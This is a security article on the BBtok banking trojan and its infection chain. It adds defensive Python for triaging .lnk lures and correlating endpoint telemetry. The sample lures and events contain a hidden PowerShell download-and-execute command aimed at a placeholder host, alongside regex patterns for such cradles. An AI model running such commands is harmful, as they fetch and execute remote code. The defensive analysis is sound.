Banking trojans are among the most damaging forms of malware. They sit quietly on a phone or computer and wait for the right moment to get at your bank account. Ransomware demands your money; a banking trojan simply takes it.
The world of banking trojans recently grew with the addition of BBtok. This strain appears to target victims in Mexico exclusively. One thing that makes BBtok stand out is its largely fileless approach: the early stages run as scripts and in-memory .NET code rather than as a conventional executable dropped on disk. BBtok spreads through malicious emails written to look as if they come from legitimate senders. The emails carry a Windows shortcut (.lnk) file that, when opened, launches a PowerShell script. By taking advantage of social engineering and simple curiosity, the attackers convince victims to open the shortcut and infect themselves.
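A shortcut lure is easy to triage without double-clicking it, because the .lnk format (Microsoft's Shell Link binary format) stores the target path and command-line arguments in fixed, documented positions. The parser below is an added example written for this article; it is not BBtok's code and not code from the original page. It reads the Shell Link header and the StringData section, pulls out the target and arguments, and flags the traits common to lure shortcuts: a script host as the target, hidden-window or encoded PowerShell flags, a download cradle, and a ShowCommand of 7 (SW_SHOWMINNOACTIVE), which keeps the spawned window out of sight. The two shortcuts it inspects are constructed inline for the demo (the URL and paths in them are placeholders); on a real case you would pass the bytes of the attachment instead.

```python
"""Static triage of a Windows shortcut (.lnk) without opening it.

Added example, not from the original article. Parses the Shell Link header
and StringData per the MS-SHLLINK layout; LinkTargetIDList and LinkInfo are
skipped by their own size fields. The sample shortcuts are constructed here.
"""
import re
import struct

SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # window shown minimised and never activated

SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript",
                "cscript", "rundll32", "regsvr32")
SUSPICIOUS_ARGS = {  # indicator name -> pattern over the argument string
    "encoded_command": re.compile(r"-(e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|bitsadmin)", re.I),
    "invoke_expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}


def parse_lnk(data: bytes) -> dict:
    """Return flags, ShowCommand and the StringData fields of a .lnk blob."""
    if len(data) < 76:
        raise ValueError("too short for a Shell Link header")
    header_size, clsid = struct.unpack_from("<I16s", data, 0)
    if header_size != 0x4C or clsid != SHELL_LINK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)      # LinkFlags
    (show_cmd,) = struct.unpack_from("<I", data, 60)   # ShowCommand
    pos = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:                # skip IDList by size
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                          # skip LinkInfo by size
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    out = {"flags": flags, "show_command": show_cmd}
    for flag, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)  # CountCharacters
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        if len(raw) != count * width:
            raise ValueError("truncated StringData")
        pos += count * width
        out[name] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return out


def triage_lnk(data: bytes) -> dict:
    """Combine the parsed fields into a verdict plus the indicators that fired."""
    info = parse_lnk(data)
    target = info.get("relative_path", "")
    args = info.get("arguments", "")
    indicators = []
    if any(host in target.lower() for host in SCRIPT_HOSTS):
        indicators.append("target_is_script_host")
    indicators += [name for name, pat in SUSPICIOUS_ARGS.items() if pat.search(args)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        indicators.append("window_minimised_no_activate")
    return {"command_line": f"{target} {args}".strip(), "indicators": indicators,
            "verdict": "suspicious" if indicators else "clean"}


def build_lnk(target: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk (no IDList/LinkInfo) for the demo."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + enc(target) + enc(arguments)


# Constructed samples: a hidden download-and-run lure, and a plain app shortcut.
LURE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoP -W Hidden -Ep Bypass -C \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage1')\"",
    show_command=SW_SHOWMINNOACTIVE)
BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for label, blob in (("lure", LURE), ("benign", BENIGN)):
        print(label, triage_lnk(blob))
```

Real lures usually carry a LinkTargetIDList and often an icon path pointing at a harmless-looking program, so the parser skips those sections rather than assuming they are absent; a shortcut that refuses to parse at all is itself worth a second look, because attackers do ship malformed headers that Explorer still tolerates.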
The malware goes through several setup stages before the infection is complete and the main BBtok component is delivered. The first stage begins when the PowerShell script runs: it downloads and executes a .NET loader. The loader sets up the persistence mechanism that makes the device run the threat at every startup. According to the analysis, BBtok achieves this by altering the winmm.dll file in the Windows directory, so that a library Windows loads routinely ends up loading the malware with it.
On 64-bit machines the loader also launches countermeasures against antivirus products. BBtok abuses the open-source Kernel Driver Utility (KDU), a tool that loads a legitimately signed but known-vulnerable driver and uses the bug in it to read and write arbitrary kernel memory. With that access, the malware attempts to delete registry entries belonging to common antivirus programs. The vulnerable driver is brought along with the malware rather than taken from the victim's system, which is why a driver being loaded from a user-writable directory is such a strong signal.
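Each of the stages described above (the shortcut-launched PowerShell, the loader writing winmm.dll under the Windows directory, a driver loaded from a user-writable path, and registry keys of security products being deleted) shows up in ordinary endpoint telemetry. The script below is an added example, not the page's own code and not anything the malware's authors published. It runs four rules over a constructed batch of Sysmon-like events and then ties the hits together by process ancestry, so that an interactive PowerShell session or a legitimate Windows servicing write to winmm.dll is not reported on its own. The event field names, the list of servicing processes and the 300-second window for driver loads are assumptions chosen for the demo.

```python
"""Correlate endpoint events into one BBtok-style install-chain finding.

Added example, not from the original article. Events are constructed below in
a Sysmon-like shape; field names (EventType, ProcessId, ParentProcessId, Image,
ParentImage, CommandLine, TargetFilename, ImageLoaded, TargetObject, Operation,
Time) are an assumption, not a vendor schema. DriverLoad events carry no
process context, so they join a chain by time proximity instead of ancestry.
"""
import re
from collections import defaultdict

SERVICING_IMAGES = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe"}  # assumption
LURE_CMDLINE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-(e|ec|enc|encodedcommand)\b|downloadstring"
    r"|invoke-webrequest|\biex\b)", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_lure_powershell(ev):
    """Stage 1: PowerShell spawned by Explorer (a double-clicked shortcut) with lure flags."""
    if ev["EventType"] != "ProcessCreate":
        return None
    if basename(ev["Image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    if basename(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    return "lure_powershell" if LURE_CMDLINE.search(ev.get("CommandLine", "")) else None


def rule_winmm_tamper(ev):
    """Stage 2: winmm.dll written anywhere under the Windows directory by a non-servicing process."""
    if ev["EventType"] != "FileCreate":
        return None
    target = ev["TargetFilename"].lower()
    if not (target.startswith("c:\\windows\\") and basename(target) == "winmm.dll"):
        return None
    return None if basename(ev["Image"]) in SERVICING_IMAGES else "winmm_dll_tamper"


def rule_driver_from_user_path(ev):
    """Stage 3: a kernel driver loaded from outside System32\\drivers (KDU brings its own)."""
    if ev["EventType"] != "DriverLoad":
        return None
    loaded = ev["ImageLoaded"].lower()
    return None if loaded.startswith("c:\\windows\\system32\\drivers\\") else "driver_outside_system32"


def rule_service_key_delete(ev):
    """Stage 3b: a service key deleted under HKLM\\SYSTEM\\...\\Services by a non-servicing process."""
    if ev["EventType"] != "RegistryEvent" or ev.get("Operation") != "DeleteKey":
        return None
    if not ev["TargetObject"].lower().startswith("hklm\\system\\currentcontrolset\\services\\"):
        return None
    return None if basename(ev["Image"]) in SERVICING_IMAGES else "service_key_deleted"


RULES = (rule_lure_powershell, rule_winmm_tamper, rule_driver_from_user_path,
         rule_service_key_delete)


def correlate(events, window_s=300):
    """One finding per lure PowerShell whose descendants (or a driver load within
    window_s seconds of it) trigger at least one later-stage rule."""
    children = defaultdict(list)
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            children[ev["ParentProcessId"]].append(ev["ProcessId"])
    hits = [(name, ev) for ev in events for name in (r(ev) for r in RULES) if name]
    findings = []
    for name, lure in hits:
        if name != "lure_powershell":
            continue
        tree, stack = {lure["ProcessId"]}, [lure["ProcessId"]]  # lure's process subtree
        while stack:
            for child in children[stack.pop()]:
                if child not in tree:
                    tree.add(child)
                    stack.append(child)
        stages = {"lure_powershell"}
        for other, ev in hits:
            if other == "lure_powershell":
                continue
            in_tree = ev.get("ProcessId") in tree
            in_window = (ev["EventType"] == "DriverLoad"
                         and 0 <= ev["Time"] - lure["Time"] <= window_s)
            if in_tree or in_window:
                stages.add(other)
        if len(stages) > 1:
            findings.append({"root_pid": lure["ProcessId"], "stages": sorted(stages)})
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
LOADER = r"C:\Users\victim\AppData\Local\Temp\loader.exe"
EVENTS = [  # constructed sample telemetry, not a real capture
    {"Time": 100, "EventType": "ProcessCreate", "ProcessId": 4120, "ParentProcessId": 1337,
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -C \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/s1')\""},
    {"Time": 104, "EventType": "ProcessCreate", "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": LOADER, "ParentImage": PS, "CommandLine": "loader.exe"},
    {"Time": 106, "EventType": "FileCreate", "ProcessId": 4188, "Image": LOADER,
     "TargetFilename": r"C:\Windows\winmm.dll"},
    {"Time": 108, "EventType": "DriverLoad",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\helper.sys"},
    {"Time": 110, "EventType": "RegistryEvent", "Operation": "DeleteKey", "ProcessId": 4188,
     "Image": LOADER, "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\ExampleAV"},
    # benign noise: servicing replaces the real winmm.dll; a user opens a plain console
    {"Time": 500, "EventType": "FileCreate", "ProcessId": 900,
     "Image": r"C:\Windows\servicing\TrustedInstaller.exe",
     "TargetFilename": r"C:\Windows\System32\winmm.dll"},
    {"Time": 600, "EventType": "ProcessCreate", "ProcessId": 5000, "ParentProcessId": 1337,
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    print(correlate(EVENTS))
```

The point of the correlation step is the second PowerShell event: on its own it is noise, and the servicing write to System32\winmm.dll is routine, so neither produces a finding. A real deployment would also check the loaded driver's hash against a list of known-vulnerable drivers and verify the on-disk winmm.dll's Authenticode signature, but both need data that cannot be embedded here.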
The BBtok trojan itself is deployed only when all of these setup steps have completed. Once on the device, it establishes a backdoor module that lets the attackers carry out a range of malicious operations remotely. They can command the malware to simulate mouse and keyboard input, manipulate program windows, list running processes and kill chosen ones, change the clipboard contents, disable the Desktop Window Manager (DWM), and more.
The criminals use these capabilities to reach their real goal: collecting the victim's banking information. BBtok displays fake "bank security" windows, styled after the victim's bank, that ask the user to re-enter their banking details. If the victim falls for it, whatever they type is harvested and sent to the attacker's command and control (C2) server. What happens to the data from there depends on who is running the operation.
Some attackers drain accounts directly, infecting computers for their own gain. Others take an indirect route. Information is a valuable commodity on the dark web, especially financial information, so rather than steal your money themselves, some sell the stolen details to interested parties on one of the many underground "marketplaces". Either way, you lose money, and people who should never have access to your bank account now have it. A banking trojan can also be just one phase of a larger identity-theft scheme, and identity theft has far-reaching effects on a person's life.
BBtok can impersonate several well-known Mexican banks. Its fake windows target AFIRME, ScotiaBank, BanBajio, Santander, Banco Azteca, Inbursa, Multiva, Banorte, HSBC, BBVA, CitiBanamex, and more. Mexican residents, and anyone who holds an account in Mexico, should be especially careful with their banking information.
Banking trojans like this can do a lot more than steal money; they are a serious threat and should be treated as one. If you receive an email from an unknown sender, do not download or open any attachments. If the email appears to come from a legitimate source, such as a shipping company or a bank, read it carefully: misspellings, odd punctuation and unusual phrasing often give a malicious email away. Be particularly wary of shortcut (.lnk) attachments; Windows hides the .lnk extension even when file extensions are set to display, so a file that looks like a document or image can actually be a shortcut that runs PowerShell. Treat any "security" window that asks you to re-enter your full banking credentials with suspicion: your bank already has them and does not need you to type them again. Take care when installing apps and software on your phone or computer, as many banking trojans pose as harmless apps, and malicious apps do occasionally slip into official stores like Google Play and the Apple App Store. You can never be too careful with your personal information.